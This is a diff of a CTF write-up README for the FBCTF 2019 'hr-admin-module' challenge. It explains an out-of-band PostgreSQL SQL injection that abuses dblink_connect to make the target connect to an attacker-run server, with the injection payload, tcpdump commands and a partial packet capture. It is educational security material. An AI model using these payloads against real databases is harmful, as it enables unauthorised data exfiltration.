PDKT-Team/ctf/fbctf2019/hr-admin-module/README.md

 - `asd' union select 1,chr(65) --`, no warning
 - `asd' union select 1,chr(-65) --`, no warning

-From obeserved behaviors, we can assume if the warning message only showed up when there is a syntax or semantic error in the query.
-If we select a non-existing database it will shows a warning message because SQL will check for table name, field name, data type, etc. during semantic check.
-But, it will not shows a warning message when `chr(-65)` is performed because it is syntactically and semantically correct although it will cause error during execution.
+From obeserved behaviors, we can assume if the warning message only appears when there is a syntax or semantic error in the query.
 Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously.

-Since no any page changes other than warning message for syntax/semantic error and no meaningful inferential observation can be performed, we can't use common SQL Injection tricks like In-Band SQL Injection or Inferential/Blind SQL Injection.
+In this case, we can't use common SQL Injection tricks like In-Band SQL Injection or Inferential/Blind SQL Injection.

-Quick googling about running PostgreSQL query asynchronously or in the background yield an information about `dblink` (https://www.postgresql.org/docs/11/dblink.html).
+Quick googling about running PostgreSQL query asynchronously yield an information about `dblink` (https://www.postgresql.org/docs/11/dblink.html).
 It's a module that supports connections to other PostgreSQL databases (or to the same database) from within a database session.
 It provides `dblink_send_query` to sends a query to be executed  asynchronously.
-This module is not enabled by default but there is a high possibility that this module is enabled in this case.
+This module is not enabled by default but it is possible this module is enabled in this case.

-Query that contains `dblink_connect` doesn't cause warning so `dblink` might be enabled.
+We can see that the query containing `dblink_connect` doesn't cause a warning so `dblink` may be enabled.

 ![](dblink-connect.png)

-Normally, `dblink_connect` can be used to open a persistent connection to a remote PostgreSQL database.
-Example: `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`.
-Because we can control the parameter of this function, we can perform SQL Server Side Request/Connection Forgery to our own host.
-That means we can perform Out-of-Band SQL Injection to exfiltrate data.
-At least, there are two ways to get the data from server:
+Normally, `dblink_connect` can be used to open a persistent connection to a remote PostgreSQL database (e.g. `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`).
+Because we can control the parameter of this function, we can perform SQL Server Side Request Forgery to our own host.
+That means, we can perform Out-of-Band SQL Injection to exfiltrate data from SQL query results.
+At least, there are two ways to do this:

-1. Set up a DNS server and then trigger the connection to `[data].our.domain` so we can see the data in the log or in DNS network packet.
+1. Set up a DNS server and then trigger the connection to `[data].our.domain` so that we can see the data in the log or in the DNS network packets.
-2. Set up a public PostgreSQL server, monitor incoming packet to PostgreSQL port, and then trigger the connection to our host with exfiltrated data as `user`/`dbname`.
-By default, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as plaintext in the network.
+2. Set up a public PostgreSQL server, monitor the incoming netowrk packets to PostgreSQL port, and then trigger a connection to our host with exfiltrated data as `user`/`dbname`.
+By default, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as a plaintext on the network.

-Second way is easier because we don't need any domain.
-We only need to set up a server with public IP, install PostgreSQL, set the PostgreSQL service to listen to \*/0.0.0.0, and run network dumper (e.g. tcpdump) to monitor the traffic to PostgreSQL port (5432 by default).
+The second method is easier because we don't need any domain.
+We only need to set up a server with a public IP, install PostgreSQL, set the PostgreSQL service to listen to \*/0.0.0.0, and run a network dumper (e.g. tcpdump) to monitor traffic to the PostgreSQL port (5432 by default).

-To set PostgreSQL so it will listen to public, set `listen_addresses` in `postgresql.conf` to `*`.
+To set PostgreSQL so that it will listen to the public, set `listen_addresses` in `postgresql.conf` to `*`.

 ```
 listen_addresses = '*'
 ```

-To monitor the incoming traffics, run `tcpdump` to monitor port 5432.
+To monitor incoming traffic, run `tcpdump` to monitor port 5432.

 ```
 sudo tcpdump -nX -i eth0 port 5432
 ```

-To see if we get the connection from target, we can try to use this query:
+To see if we get a connection from the target, we can try using this query:

 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) --
 ```

-If success, we got a nice piece of network packet with `user` and `dbname`.
+If successful, we get a piece of network packet with readable `user` and `dbname`.

 ```
 17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42